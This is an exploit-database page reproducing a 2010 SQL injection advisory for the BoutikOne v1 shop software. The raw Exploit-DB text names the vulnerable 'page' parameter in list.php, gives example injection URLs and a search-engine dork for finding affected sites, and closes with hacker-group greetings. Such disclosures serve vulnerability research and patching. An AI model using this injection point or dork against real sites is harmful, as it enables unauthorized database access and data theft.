BoutikOne® v1 (list.php) SQL Injection Vulnerabilitie

vendor:

BoutikOne®

by:

BrOx-Dz, E.dz@hotmail.fr

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: BoutikOne®

Affected Version From: BoutikOne® v1

Affected Version To: BoutikOne® v1

Patch Exists: NO

Related CWE: N/A

CPE: a:boutikone:boutikone

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP

2010

BoutikOne® v1 (list.php) SQL Injection Vulnerabilitie

An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. The attacker can inject malicious SQL queries into the vulnerable parameter and execute arbitrary SQL commands in the back-end database.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

  ________  _____________  / /_
  / ___/ _ \/ ___/ ___/ _ \/ __/
 (__  )  __/ /__/ /  /  __/ /_
/____/\___/\___/_/   \___/\__/
#####################################################################
# Exploit Title: BoutikOne® v1 (list.php) SQL Injection Vulnerabilitie
# Date: 19/09/2010
# Author: BrOx-Dz
# Author: E.dz@hotmail.fr
# Software Link: http://www.boutikone.com/
# Dork  : Powered by BoutikOne®
# Version: BoutikOne®
# Tested on: windows xp pack 3
#####################################################################

----------------------------------------------------------------------------

#e.g :
http://server/patch/list.php?lang=1&path=50&num=38&action=n&sort=Id&page=0[sql]

#demo :
http://www.site.com/list.php?lang=1&path=42&num=13&action=n&sort=Id&page=0'

----------------------------------------------------------------------------
greatez:

lagripe-dz  mca_crb  amine  halim all dz members.

www.sec4ever.com / www.v4-team.com/cc/ / www.h4ckforu.com/vb/.